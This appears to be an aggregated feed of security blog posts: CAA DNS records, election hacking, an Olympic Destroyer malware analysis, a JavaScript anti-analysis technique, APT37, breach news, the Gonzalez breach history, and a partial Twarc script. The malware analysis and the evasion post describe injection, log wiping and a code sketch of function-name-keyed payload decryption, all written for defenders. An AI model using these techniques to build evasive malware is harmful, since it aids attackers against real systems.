Many hosted DNS providers also support CAA records, including Amazon Route 53, Cloudflare, DNS Made Easy, and Google Cloud DNS.

Example: (my own website DNS)

As per the policy, I have configured ONLY "" to be allowed, but due to Cloudflare Universal SSL support, the following certificate authorities get configured as well:

  • 0 issue ""
  • 0 issue ""
  • 0 issue ""
  • 0 issuewild ""
  • 0 issuewild ""
  • 0 issuewild ""


Also, I configured iodef for violation reporting: 0 iodef ""

How's the WWW doing with CAA?

After the auditing exercise, I was curious to know how the top 10,000 Alexa websites are doing with CAA, and the results surprised me: only 4% of the top 10K websites have a CAA DNS record.

CAA adoption among the Alexa top 10,000 websites (pie chart)

[Update 27-Feb-18]: This pie chart was updated with correct numbers. Thanks to Ich Bin Niche Sie for identifying the calculation error.

We still have a long way to go with new security flags and policies like the CAA DNS record, the security.txt file, and the like, and I shall keep covering these topics to evangelize security in every possible way without disrupting business. Remember to always work hand in hand with the business.

Stay safe, and tuned in.

  1. Comodo CA attack by Iranian hackers: ↩︎

  2. Dutch DigiNotar attack by Iranian hackers: ↩︎

  3. Trustwave Subroot Certificate: ↩︎

  4. CAA Checking Mandatory (Ballot 187 results) 2017: ↩︎

  5. Wikipedia Article: ↩︎

  6. IETF RFC 6844 on CAA record: ↩︎

  7. The confusion of critical flag: ↩︎

  8. Wikipedia Support Section: ↩︎

“Know Thyself Better Than The Adversary – ICS Asset Identification and Tracking”

Know Thyself Better Than The Adversary - ICS Asset Identification & Tracking This blog was written by Dean Parsons. As SANS prepares for the 2018 ICS Summit in Orlando, Dean Parsons is preparing a SANS ICS Webcast to precede the event, a Summit talk, and a SANS@Night presentation. In this blog, Dean tackles some common … Continue reading Know Thyself Better Than The Adversary - ICS Asset Identification and Tracking

States Worry About Election Hacking as Midterms Approach

Mueller indictments of Russian cyber criminals put election hacking at top of mind

State officials expressed grave concerns about election hacking the day after Special Counsel Robert Mueller handed down indictments of 13 Russian nationals on charges of interfering with the 2016 presidential election. The Washington Post reports:

At a conference of state secretaries of state in Washington, several officials said the government was slow to share information about specific threats faced by states during the 2016 election. According to the Department of Homeland Security, Russian government hackers tried to gain access to voter registration files or public election sites in 21 states.

Although the hackers are not believed to have manipulated or removed data from state systems, experts worry that the attackers might be more successful this year. And state officials say reticence on the part of Homeland Security to share sensitive information about the incidents could hamper efforts to prepare for the midterms.


Granted, the Mueller indictments allege disinformation and propaganda-spreading using social media, not direct election hacking. However, taken together with the attacks on state elections systems, it is now indisputable that Russian cyber criminals used a highly sophisticated, multi-pronged approach to tamper with the 2016 election. While there have been no reported attacks on state systems since, there is no reason to believe that election hacking attempts by Russians or other foreign threat actors will simply cease; if anything, cyber criminals are likely to step up their game during the critical 2018 midterms this November.

These aren’t new issues; cyber security was a top issue leading up to the 2016 election. Everyone agreed then, and everyone continues to agree now, that more needs to be done to prevent election hacking. So, what’s the holdup?

One of the biggest issues in tackling election hacking is the sheer logistics of U.S. elections. The United States doesn’t have one large national “election system”; it has a patchwork of thousands of mini election systems overseen by individual states and local authorities. Some states have hundreds, even thousands of local election agencies; The Washington Post reports that Wisconsin alone has 1,800. To its credit, Wisconsin has encrypted its database and would like to implement multi-factor authentication. However, this would require election employees to have a second device, such as a cell phone, to log in – and not all of them have work-issued phones or even high-speed internet access.

Not surprisingly, funding is also a stumbling block. Even prior to the 2016 elections, cyber security experts were imploring states to ensure that all of their polling places were using either paper ballots with optical scanners or electronic machines capable of producing paper audit trails. However, as we head toward the midterms, five states are still using electronic machines that do not produce audit trails, and another nine have at least some precincts that still lack paper ballots or audit trails. The problem isn’t that these states don’t want to replace their antiquated systems or hire cyber security experts to help them; they simply don’t have the budget to do so.

Congress Must Act to Prevent Election Hacking

Several bills that would appropriate more money for states to secure their systems against election hacking are pending before Congress, including the Secure Elections Act. Congress can also release funding that was authorized by the 2002 Help America Vote Act, but never appropriated.

The integrity of our elections is the cornerstone of our nation’s democracy. Proactive cyber security measures can prevent election hacking, but states cannot be expected to go it alone; cyber attacks do not respect borders.

The cyber security experts at Lazarus Alliance have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting organizations of all sizes from security breaches. Our full-service risk assessment services and Continuum GRC RegTech software will help protect your organization from data breaches, ransomware attacks, and other cyber threats.

Lazarus Alliance is proactive cyber security®. Call 1-888-896-7580 to discuss your organization’s cyber security needs and find out how we can help your organization adhere to cyber security regulations, maintain compliance, and secure your systems.

The post States Worry About Election Hacking as Midterms Approach appeared first on .

Olympic Destroyer: A new Candidate in South Korea

Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani

A new piece of malware recently made the headlines, targeting several computers during the opening ceremony of the Pyeongchang 2018 Olympic Games. While the Cisco Talos group, and later Endgame, have already covered it, we noticed a couple of interesting aspects not previously addressed that we would like to share: its taste for hiding its traces, and its peculiar decryption routine. We would also like to draw attention to how the threat uses multiple components to breach the infected system. This knowledge allows us to make our sandbox even more effective against emerging advanced threats, so we would like to share some of the details.

The Olympic Destroyer

The malware is responsible for destroying (wiping out) files on network shares, making infected machines irrecoverable, and propagating itself with the newly harvested credentials across compromised networks.

To achieve this, the main executable file (sha1: 26de43cc558a4e0e60eddd4dc9321bcb5a0a181c) drops and runs the following components, all originally encrypted and embedded in the resource section:

  • a browser credential stealer (sha1: 492d4a4a74099074e26b5dffd0d15434009ccfd9),
  • a system credential stealer (a Mimikatz-like DLL – sha1: ed1cd9e086923797fe2e5fe8ff19685bd2a40072 for 64-bit OS, sha1: 21ca710ed3bc536bd5394f0bff6d6140809156cf for 32-bit OS),
  • a wiper component (sha1: 8350e06f52e5c660bb416b03edb6a5ddc50c3a59), and
  • a legitimate signed copy of the PsExec utility, used for lateral movement (sha1: e50d9e3bd91908e13a26b3e23edeaf577fb3a095).

A wiper deleting data and logs

The wiper component is responsible for wiping data from the network shares, but it also destroys the attacked system by deleting backups, disabling services (Figure 1), and clearing event logs using wevtutil, thereby making the infected machine unusable. Very similar behaviors have been observed in other ransomware/wiper attacks, including infamous ones such as BadRabbit and NotPetya.


Figure 1. Disabling Windows services

After wiping the files, the malicious component sleeps for an hour (probably to make sure that the spawned thread has finished its job) and calls the InitiateSystemShutdownExW API with the system-failure reason code (SHTDN_REASON_MAJOR_SYSTEM, 0x00050000) to shut down the system.

An unusual decryption to extract the resources

As mentioned before, the executables are stored encrypted inside the binary’s resource section. This prevents static extraction of the embedded files, thus slowing down the analysis process. Another reason for going “offline” (compared with, e.g., the Smoke Loader) is to bypass network-based security solutions (which, in turn, decreases the probability of detection). When the malware executes, the resources are loaded via the LoadResource API and decrypted via MMX/SSE instructions (sometimes used by malware to bypass code emulation), as we observed while debugging it. In this case, however, the instructions are used to implement the AES cipher and the MD5 hash function (instead of using standard Windows APIs such as CryptEncrypt and CryptCreateHash) to decrypt the resources. The MD5 algorithm is used to generate the symmetric key, which is equal to the MD5 of a hardcoded string “123”, multiplied by 2.
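Assuming “multiplied by 2” means the 16-byte MD5 digest concatenated with itself (our reading, which matches the 32 bytes an AES-256 key requires), the key derivation reduces to:

```python
import hashlib

# "123" is the hardcoded string reported in the sample.
digest = hashlib.md5(b"123").digest()   # 16-byte MD5 digest
key = digest * 2                        # repeated to the 32 bytes of an AES-256 key
```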

The algorithms can also be identified by looking at some characteristic constants:

  1. the Rcon array used during the AES key schedule (see Figure 2), and
  2. the MD5 magic initialization constants.

The decrypted resources are then dropped in a temporary directory and, finally, executed.

Figure 2. AES key setup routine for resources decryption


An interesting aspect of the decryption is its usage of SSE instructions. We exploited this peculiarity and hunted for other samples sharing the same code, for example by searching for the associated codehash. The latter is a normalized representation of the code mnemonics included in the function block (see Figure 3), as produced by the Lastline sandbox and exported as part of the process snapshots.

Another interesting sample found during our investigation (sha1: 84aa2651258a702434233a946336b1adf1584c49) contained harvested system credentials belonging to Atos, a technical provider of the Pyeongchang games (see here for more details).


Figure 3. Hardcoded credentials in an Olympic Destroyer sample targeting the Atos company

A Shellcode Injection Wiping the Injector

Another peculiarity of the Olympic Destroyer is how it deletes itself after execution. While self-deletion is a common practice among malware, it is quite uncommon to see the injected shellcode taking care of it: the shellcode, once injected in a legitimate copy of notepad.exe, waits until the sample terminates, and then deletes it.


Figure 4. Checking whether the file is terminated or still running

This is done by first calling the CreateFileW API and checking whether the sample is still running (as shown in Figure 4); the shellcode then overwrites the file with a sequence of 0x00 bytes, deletes it via the DeleteFileW API, and finally exits the process.

The remainder of the injection process is very common and it is similar to what we have described in one of our previous blog posts: the malware first spawns a copy of notepad.exe by calling the CreateProcessW function; then allocates memory in the process by calling VirtualAllocEx, and writes shellcode in the allocated memory through WriteProcessMemory. Finally, it creates a remote thread for its execution via CreateRemoteThread.


Figure 5. Shellcode injection in a copy of notepad.exe

Lastline Analysis Overview

Figure 6 shows how the analysis overview looks when analyzing the sample discussed in this article:


Figure 6. Analysis overview of the Olympic Destroyer


In this article, we analyzed a variant of the Olympic Destroyer, a multi-component malware that steals credentials before making the targeted machines unusable by wiping out data on the network shares and deleting backups. Additionally, the effort put into deleting its traces shows a deliberate attempt to hinder any forensic activity. We have also shown how Lastline found similar samples related to this attack, based on the example of the decryption routine, and how we detect them. This is a perfect example of how threats are continuously improving, making them ever stealthier and more difficult to extract and analyze.

Appendix: IoCs

Olympic Destroyer
26de43cc558a4e0e60eddd4dc9321bcb5a0a181c (sample analyzed in this article)

The post Olympic Destroyer: A new Candidate in South Korea appeared first on Lastline.

Control Flow Integrity: a Javascript Evasion Technique

Understanding the real code behind a malware sample is a great opportunity for malware analysts: it increases the chances of understanding what the sample really does. Unfortunately, figuring out the "real code" is not always possible; sometimes the analyst needs tools like disassemblers or debuggers in order to infer the malware's actions. However, when the sample is implemented in "interpreted code" such as (but not limited to) Java, JavaScript, VBS, or .NET, there are several ways to get a closer look at the "code".

Unfortunately, attackers know what the analysis techniques are, and they often implement evasive actions in order to limit the analyst's understanding or to make the overall analysis harder and harder. An evasive technique might detect whether the code runs in a VM, run the code only in given environments, avoid debugging connectors, or defeat reverse-engineering operations such as de-obfuscation techniques. Today's post is about that: I'd like to focus my readers' attention on a fun and innovative way to evade reverse-engineering techniques based on JavaScript technology.

JavaScript is becoming more important day by day as an attack vector. It is often used as a dropper stage, and its implementation is influenced by many flavours and coding styles, but as a bottom line, almost every JavaScript malware is obfuscated. The following image shows an example of an obfuscated JavaScript payload (taken from one of my analyses).

Example: Obfuscated Javascript

As a first step, the malware analyst would try to de-obfuscate such code by digging into it. Starting from simple cut-and-paste and moving on to more powerful substitution scripts, the analyst would rename functions and variables in order to reduce complexity and make clear what each code section does. But JavaScript offers a nice way to get the callee function's name, which can be used to detect whether a function name has changed over time: arguments.callee.caller. By using that function, the attacker can build a stack trace in which the chain of executed function names is saved. The attacker then grabs those function names and uses them as the key to dynamically decrypt specific, crafted JavaScript code. Using this technique, the attacker gets an implicit form of control flow integrity: if a function is renamed, or if the function order differs even slightly from the designed one, the resulting "hash" will be different. If the hash is different, the generated key will be different as well, and it will not be able to decrypt and launch the specific encrypted code.

But let's take a closer look at what I mean. The following snippet shows a clear (not obfuscated) example explaining this technique; I decided to show non-obfuscated code here just to keep it simple.

Each internal stage evaluates (eval()) some content. On rows 21 and 25, the functions cow001 and pyth001 evaluate XOR-decrypted content. The xor_decrypt function takes two arguments: the decoding key and the payload to be decrypted. Each internal stage function uses the name of the callee, obtained via arguments.callee, as its decryption key. If the function name is the "designed" one (the one the attacker used to encrypt the payload), the encrypted content is executed with no exceptions. On the other hand, if the function has been renamed (for example, by the analyst for his convenience), the evaluation fails, and the attacker can potentially trigger a different code path (by using a simple try/catch statement).
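The same idea can be illustrated with a short Python analogue (a toy sketch: the inspect module stands in for JavaScript's arguments.callee, and the stage function's own name is the XOR key, so renaming cow001 during de-obfuscation breaks decryption; the function and payload here mirror the names in the snippet, not the actual malware):

```python
import inspect

def xor_crypt(key: str, data: bytes) -> bytes:
    # XOR is symmetric: the same routine encrypts and decrypts.
    kb = key.encode()
    return bytes(b ^ kb[i % len(kb)] for i, b in enumerate(data))

# Attacker side: the next stage is encrypted under the exact name of the
# function that is designed to execute it.
STAGE = xor_crypt("cow001", b"print('stage running')")

def cow001():
    # Victim side: the decryption key is this function's own name.
    # Rename the function and the key (hence the plaintext) changes,
    # so the eval/exec of the next stage silently fails.
    key = inspect.currentframe().f_code.co_name
    exec(xor_crypt(key, STAGE).decode())
```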

Before launching the sample in the wild, the attacker needs to prepare the "attack path" by developing the malicious JavaScript and obfuscating it. Once the obfuscation has taken place, the attacker needs an additional script (such as the following one) to re-encrypt the payloads according to the obfuscated function names, replacing the original encrypted payloads in the final JavaScript file with ones encrypted using the obfuscated function names as keys.

The attacker is now able to write JavaScript code that enforces its own control flow. If the attacker iterates this concept over and over again, he can block or control the code execution, achieving a complete reverse-engineering evasion technique.
Watch out and stay safe!

APT37 (Reaper): The Overlooked North Korean Actor

On Feb. 2, 2018, we published a blog detailing the use of an Adobe Flash zero-day vulnerability (CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper).

Our analysis of APT37’s recent activity reveals that the group’s operations are expanding in scope and sophistication, with a toolset that includes access to zero-day vulnerabilities and wiper malware. We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests. FireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123.

Read our report, APT37 (Reaper): The Overlooked North Korean Actor, to learn more about our assessment that this threat actor is working on behalf of the North Korean government, as well as various other details about their operations:

  • Targeting: Primarily South Korea – though also Japan, Vietnam and the Middle East – in various industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive, and healthcare.
  • Initial Infection Tactics: Social engineering tactics tailored specifically to desired targets, strategic web compromises typical of targeted cyber espionage operations, and the use of torrent file-sharing sites to distribute malware more indiscriminately.
  • Exploited Vulnerabilities: Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash. The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802), and the ability to incorporate them into operations.
  • Command and Control Infrastructure: Compromised servers, messaging platforms, and cloud service providers to avoid detection. The group has shown increasing sophistication by improving their operational security over time.
  • Malware: A diverse suite of malware for initial intrusion and exfiltration. Along with custom malware used for espionage purposes, APT37 also has access to destructive malware.

More information on this threat actor is found in our report, APT37 (Reaper): The Overlooked North Korean Actor. You can also register for our upcoming webinar for additional insights into this group.

It’s Five O’Clock Somewhere – Business Security Weekly #74

This week, Michael and Paul interview Joe Kay, Founder & CEO of Enswarm! In the Tracking Security Information segment, IdentityMind Global raised $10M, DataVisor raised $40M, & Infocyte raised $5.2M! Last but not least, our second feature interview with Sean D'Souza, author of The Brain Audit! All that and more, on this episode of Business Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Weekly Cyber Risk Roundup: Olympic Malware and Russian Cybercrime

More information was revealed this week about the Olympic Destroyer malware and how it was used to disrupt the availability of the Pyeongchang Olympics’ official website for a 12-hour period earlier this month.

It appears that back in December, a threat actor may have compromised the computer systems of Atos, an IT service provider for the Olympics, and then used that access to perform reconnaissance and eventually spread the destructive wiper malware known as “Olympic Destroyer.”

The malware was designed to delete files and event logs by using legitimate Windows features such as PsExec and Windows Management Instrumentation, Cisco researchers said.

Cyberscoop reported that Atos, which is hosting the cloud infrastructure for the Pyeongchang games, had been compromised since at least December 2017, according to VirusTotal samples. The threat actor then used the stolen login credentials of Olympics staff to quickly propagate the malware.

An Atos spokesperson confirmed the breach and said that investigations into the incident are continuing.

“[The attack] used hardcoded credentials embedded in a malware,” the spokesperson said. “The credentials embedded in the malware do not indicate the origin of the attack. No competitions were ever affected and the team is continuing to work to ensure that the Olympic Games are running smoothly.”

The Olympic Destroyer malware samples on VirusTotal contained various stolen employee data such as usernames and passwords; however, it is unclear if that information was stolen via a supply-chain attack or some other means, Cyberscoop reported.


Other trending cybercrime events from the week include:

  • Organizations expose data: Researchers discovered a publicly exposed Amazon S3 bucket belonging to Bongo International LLC, which was bought by FedEx in 2014, that contained more than 119 thousand scanned documents of U.S. and international citizens. Researchers found a publicly exposed database belonging to The Sacramento Bee that contained information on all 19 million registered voters in California, as well as internal data such as the paper’s internal system information, API information, and other content. Researchers discovered a publicly exposed network-attached storage device belonging to the Maryland Joint Insurance Association that contained a variety of sensitive customer information and other credentials. The City of Thomasville said that it accidentally released the Social Security numbers of 269 employees to someone who put in a public record request for employee salaries, and those documents were then posted on a Facebook page.
  • Notable phishing attacks: The Holyoke Treasurer’s Office in Massachusetts said that it lost $10,000 due to a phishing attack that requested an urgent wire payment be processed. Sutter Health said that a phishing attack at legal services vendor Salem and Green led to unauthorized access to an employee email account that contained personal information for individuals related to mergers and acquisitions activity. The Connecticut Airport Authority said that employee email accounts were compromised in a phishing attack and that personal information may have been compromised as a result.
  • User and employee accounts accessed: A phishing attack led to more than 50,000 Snapchat users having their credentials stolen, The Verge reported. A hacker said that it’s easy to brute force user logins for Freedom Mobile and gain access to customers’ personal information. Entergy is notifying employees of a breach of W-2 information via its contractor’s website TALX due to unauthorized individuals answering employees’ personal questions and resetting PINs.
  • Other notable events: Makeup Geek is notifying customers of the discovery of malware on its website that led to the theft of personal and financial information entered by visitors over a two-week period in December 2017. The Russian central bank said that hackers managed to steal approximately $6 million from a Russian bank in 2017 in an attack that leveraged the SWIFT messaging system. Western Union is informing some customers of a third-party data breach at “an external vendor system formerly used by Western Union for secure data storage” that may have exposed their personal information.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week

The U.S. government issued a formal statement this past week blaming the Russian military for the June 2017 outbreak of NotPetya malware. Then on Friday, the day after the NotPetya accusations, the Justice Department indicted 13 Russian individuals and three Russian companies for using information warfare to interfere with the U.S. political system, including the 2016 presidential election. Those stories have once again pushed the alleged cyber activities of the Russian government into the national spotlight.

A statement on NotPetya from White House Press Secretary Sarah Huckabee Sanders described the outbreak as “the most destructive and costly cyber-attack in history” and vowed that the “reckless and indiscriminate cyber-attack … will be met with international consequences.” Newsweek reported that the NotPetya outbreak, which leveraged the popular Ukrainian accounting software M.E. Doc to spread, cost companies more than $1.2 billion. The United Kingdom also publicly blamed Russia for the attacks, writing in a statement that “malicious cyber activity will not be tolerated.” A spokesperson for Russian President Vladimir Putin denied the allegations as “the continuation of the Russophobic campaign.”

It remains unclear what “consequences” the U.S. will impose in response to NotPetya. Politicians are still urging President Trump to enforce sanctions on Russia that were passed with bipartisan majorities in July. Newsday reported that congressmen such as Democratic Sen. Chuck Schumer and Republican Rep. Peter King have urged those sanctions to be enforced following Friday’s indictment of 13 Russians and three Russian companies.

The indictment alleges the individuals attempted to “spread distrust” towards U.S. political candidates and the U.S. political system by using stolen or fictitious identities and documents to impersonate politically active Americans, purchase political advertisements on social media platforms, and pay real Americans to engage in political activities such as rallies. For example, the indictment alleges that after the 2016 presidential election, the Russian operatives staged rallies both in favor of and against Donald Trump in New York on the same day in order to further their goal of promoting discord.

As The New York Times reported, none of those indicted have been arrested, and Russia is not expected to extradite those charged to the U.S. to face prosecution. Instead, the goal is to name and shame the operatives and make it harder for them to work undetected in future operations.

Drinkman and Smilianets Sentenced: The End to Our Longest Data Breach Saga?

On Thursday, February 15, 2018, we may have finally reached the end of the Albert Gonzalez data breach saga.  Vladimir Drinkman, age 37, was sentenced to 144 months in prison after pleading guilty before U.S. District Judge Jerome Simandle in New Jersey.  His colleague, Dmitriy Smilianets, age 34, had also pleaded guilty and was sentenced to 51 months and 21 days in prison (which is basically "time served," so he'll walk immediately).  The pair were arrested in the Netherlands on June 28, 2012, and the guilty pleas happened in September 2015 after they were extradited to New Jersey.

Those who follow data breaches will certainly be familiar with Albert Gonzalez, but may not realize how far back his criminal career goes.

On July 24, 2003, the NYPD arrested Gonzalez in front of a Chase Bank ATM at 2219 Broadway, finding him in possession of 15 counterfeit Chase ATM cards and $3,000 in cash. (See case 1:09-cr-00626-JBS.)  After that arrest, Gonzalez was taken under the wing of a pair of Secret Service agents, David Esposito and Steve Ward.  Gonzalez describes some of the activities he engaged in during his time as a CI in the 53-page appeal that he filed on March 24, 2011 from his prison cell in Milan, Michigan.

At one point, he claims that he explained to Agent Ward that he owed a Russian criminal $5,000 and couldn't afford to pay it.  According to his appeal, Ward told him to "Go do your thing, just don't get caught," and later asked him if he had "handled it." Because of this, Gonzalez (who, according to his own sentencing memo, likely has Asperger's) claims he believed that he had permission to hack, as long as he didn't get caught.

Over Christmas 2007, Gonzalez and his crew hacked Heartland Payment Systems and stole around 130 million credit and debit cards.  He was also charged with hacking 7-Eleven (August 2007) and Hannaford Brothers (November 2007), where he stole 4.2 million credit and debit cards. Two additional data breaches, against "Company A" and "Company B," were also listed.  Gonzalez's indictment refers to "HACKER 1 who resided in or near Russia" and "HACKER 2 who resided in or near Russia."  Another co-conspirator, "PT," was later identified as Patrick Toey, a resident of Virginia Beach, VA.  (Patrick Toey's sentencing memorandum is a fascinating document that describes his first "cash out trip" working for Albert Gonzalez in 2003. Toey describes being a high school dropout who smoked marijuana and drank heavily, and who was "put on a bus to New York" by his mother to do the cash out run because she needed rent money.  Toey later moved in with Gonzalez in Miami, where he describes hacking Forever 21 "for Gonzalez," among other hacks.)

Gonzalez's extracurricular activities caught up with him when Maksym Yastremskiy (AKA Maksik) was arrested in Turkey.  Another point of Gonzalez's appeal was that Maksik had been tortured by Turkish police, and that without said torture he never would have confessed, which would have meant that Gonzalez (then acting online as "Segvec") would never have been identified or arrested.  Gonzalez claims that he suffered from an inadequate defense, because his lawyer should have objected to the evidence "obtained under torture."  These charges against Gonzalez were tried in the Eastern District of New York (2:08-cr-00160-SJF-AKT) and proved that Gonzalez was part of the Dave & Buster's data breach.

On December 15, 2009, Gonzalez tried to shrug off some of his federal charges by filing a sentencing memo claiming that he lacked the "capacity to knowingly evaluate the wrongfulness of his actions," asserting that his criminal behavior "was consistent with description of the Asperger's disorder" and that he exhibited characteristics of "Internet addiction."  Two weeks later, after unsuccessfully arguing that the court could not conduct its own psychological exam, Gonzalez signed a guilty plea under which the prosecutor agreed to seek a sentence of no more than 17 years. He is currently imprisoned in Yazoo, Mississippi (FBOP # 25702-050), scheduled to be released October 29, 2025.

Eventually "HACKER 1" and "HACKER 2" were indicted themselves in April 2012, with an arrest warrant issued in July 2012, but because some of the criminals were still at large, the indictment was not unsealed until December 18, 2013. HACKER 1 was Drinkman.  HACKER 2 was Alexandr Kalinin, who was also indicted with Drinkman and Smilianets.

Shortly after the Target Data Breach, I created a presentation called "Target Data Breach: Lessons Learned" which drew heavily on the history of Drinkman and Smilianets. Some of their documented data breaches included:
  • NASDAQ, May 2007: loss of control
  • 7-Eleven, August 2007
  • Carrefour, October 2007: 2 million cards
  • JCPenney, October 2007
  • Hannaford, November 2007: 4.2 million cards
  • Wet Seal, January 2008
  • Commidea, November 2008: 30 million cards
  • Dexia Bank Belgium, Feb '08 to Feb '09
  • JetBlue, Jan '08 to Feb '11
  • Dow Jones, 2009
  • EuroNet, Jul '10 to Oct '11: 2 million cards
  • Visa Jordan, Feb to Mar '11: 800,000 cards
  • Global Payments Systems, Jan '11 to Mar '12
  • Diners Club Singapore, Jun '11
  • Ingenicard, Mar '12 to Dec '12

During the time of these attacks, Dmitriy Smilianets was also leading the video game world.  His team, Moscow 5, was the "Intel Extreme Masters" champion in the first League of Legends championship, also placing in the Counter-Strike category.   Smilianets turned out not to be the hacker; rather, he specialized in selling the credit cards that the other team members stole.  Steal a few hundred million credit cards and you can buy a nice gaming rig!

Smilianets with his World Champion League of Legends team in 2012

How did these data breaches work?

Lockheed Martin's famous paper "Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains" laid out the phases of an attack like this:

But my friend Daniel Clemens had explained these same phases to me years before, when he was teaching me the basics of penetration testing as he was first starting Packet Ninjas!

1. External Recon - Gonzalez and his crew scanned for Internet-facing SQL servers
2. Attack (Dan calls this "Establishing a Foothold") - using common SQL configuration weaknesses, they caused a set of additional tools to be downloaded from the Internet
3. Internal Recon - these tools included a password dumper, password cracker, port scanner, and tools for bulk exporting data
4. Expand (Dan calls this "Creating a Stronghold") - usually this consisted of monitoring the network until they found a Domain Admin userid and password. (For example, in the Heartland Payments attack, the VERITAS userid was found to have the password "BACKUP," which unlocked every server on the network!)
5. Dominate - Gonzalez's crew would then schedule an SQL script to run a nightly dump of their card data
6. Exfiltrate - data was sent to remote servers via outbound FTP

In Rolling Stone, Gonzalez claims he compromised more than 250 networks.
The Rolling Stone article, "Sex, Drugs, and the Biggest Cybercrime of All Time," also introduces Steven Watt, who was charged in Massachusetts in October 2008 for providing attack tools to Gonzalez.  Watt's tools were used in breaches including BJ's Wholesale Club, Boston Market, Barnes & Noble, Sports Authority, Forever 21, DSW, and OfficeMax.  As part of his sentencing, Watt was ordered to repay $171.5 million.

Almost all of those data breaches followed the same model: scan, SQL inject, download tools, plant a foothold, convert it to a stronghold by becoming a domain admin, dominate the network, and exfiltrate the data.

How did the Target data breach happen, by the way?  Target is still listed as "Unsolved" ...   but let's review.  An SQL injection led to downloaded tools (including NetCat, PsExec, QuarksPWDump, ElcomSoft's Proactive Password Auditor, SomarSoft's DumpSec, Angry IP Scanner for finding database servers, and Microsoft's OSQL and BCP (Bulk Copy)), a Domain Admin password was found (in Target's case, a BMC server monitoring tool running the default password), the POS malware was installed, and data exfiltration began.

Sound familiar?


With most of Gonzalez's crew in prison by 2010, the data breaches kept right on coming, thanks to Drinkman and Smilianets. 

Drinkman, the hacker, was sentenced to 144 months in prison.
Smilianets, the card broker, was sentenced to 51 months and 21 days, which was basically "time served" -- he was extradited to the US on September 7, 2012, so he'll basically walk.

Will Smilianets return to video gaming? To money laundering? Or will he perhaps choose to go straight?

Meanwhile, Alexandr Kalinin of St. Petersburg, Russia; Mikhail Rytikov of Odessa, Ukraine; and Roman Kotov of Moscow, Russia, are all still at large.  Have they learned from the fate of their co-conspirators? Or are they, in all likelihood, scanning networks for SQL servers, injecting them, dropping tools, planting footholds, creating strongholds, and exfiltrating credit card data from American companies every day?

Kalinin (AKA Grig, AKA "g", AKA "tempo") is wanted for hacking NASDAQ and planting malware that ran on the NASDAQ networks from 2008 to 2010.  (See the indictment in the Southern District of New York, filed 24JUL2013 ==> 1:13-cr-00548-ALC )

Mykhailo Sergiyovych Rytikov is wanted in the Western District of Pennsylvania for his role in a major Zeus malware case, in which he leased servers to other malware operators.  Rytikov is also indicted in the Eastern District of Virginia, along with Andriy DERKACH, for running a "dumps checking service" that processed at least 1.8 million credit cards in the first half of 2009 and directly led to more than $12M in fraud (1:12-cr-00522-AJT, filed 08AUG2013).  Rytikov does have a New York attorney presenting a defense in the case -- Arkady Bukh argues that while Rytikov is definitely involved in web hosting, he isn't responsible for what happens on the websites he hosts.

Roman Kotov, along with Rytikov and Kalinin, is still wanted in New Jersey as part of case 1:09-cr-00626-JBS (Chief Judge Jerome B. Simandle). This is the same case under which Drinkman and Smilianets were just sentenced.

It’s Just Beautiful – Application Security Weekly #06

This week, Keith and Paul discuss Data Security and Bug Bounty programs! In the news, Lenovo warns of critical Wifi vulnerability, Russian nuclear scientists arrested for Bitcoin mining plot, remote workers outperforming office workers, and more on this episode of Application Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

Searching Twitter With Twarc

Twarc makes it really easy to search Twitter via the API. Simply create a twarc object using your own API keys and then pass your search query into twarc’s search() function to get a stream of Tweet objects. Remember that, by default, the Twitter API will only return results from the last 7 days. However, this is useful enough if we’re looking for fresh information on a topic.

Since this methodology is so simple, posting code for a tool that simply prints the resulting tweets to stdout would make for a boring blog post. Here I present a tool that collects a bunch of metadata from the returned Tweet objects. Here’s what it does:

  • records frequency distributions of URLs, hashtags, and users
  • records interactions between users and hashtags
  • outputs csv files that can be imported into Gephi for graphing
  • downloads all images found in Tweets
  • records each Tweet’s text along with the URL of the Tweet
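
For readers unfamiliar with Gephi's input format, the graph CSVs produced here are simple source,target,weight edge lists. The snippet below is a quick illustrative sketch of that transformation; the nested interaction-count dict and its values are invented sample data, not output from a real search:

```python
# Sketch: turning a nested interaction-count dict into Gephi-style
# "source,target,weight" edge-list rows (sample data is invented)
user_user_graph = {"alice": {"bob": 3, "carol": 1}}

rows = []
for source, targets in sorted(user_user_graph.items()):
    for target, count in sorted(targets.items()):
        rows.append(source + "," + target + "," + str(count))

print(rows)  # → ['alice,bob,3', 'alice,carol,1']
```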

The code doesn’t really need explanation, so here’s the whole thing.

from collections import Counter
from itertools import combinations
from twarc import Twarc
import requests
import sys
import os
import shutil
import io
import re
import json

# Helper functions for saving json, csv and formatted txt files
def save_json(variable, filename):
  with open(filename, "w", encoding="utf-8") as f:
    f.write(json.dumps(variable, indent=4, ensure_ascii=False))

def save_csv(data, filename):
  with open(filename, "w", encoding="utf-8") as handle:
    for source, targets in sorted(data.items()):
      for target, count in sorted(targets.items()):
        if source != target and source is not None and target is not None:
          handle.write(source + "," + target + "," + str(count) + "\n")

def save_text(data, filename):
  with open(filename, "w", encoding="utf-8") as handle:
    for item, count in data.most_common():
      handle.write(str(count) + "\t" + item + "\n")

# Returns the screen_name of the user retweeted, or None
def retweeted_user(status):
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        return user["screen_name"]

# Returns a list of screen_names that the user interacted with in this Tweet
def get_interactions(status):
  interactions = []
  if "in_reply_to_screen_name" in status:
    replied_to = status["in_reply_to_screen_name"]
    if replied_to is not None and replied_to not in interactions:
      interactions.append(replied_to)
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
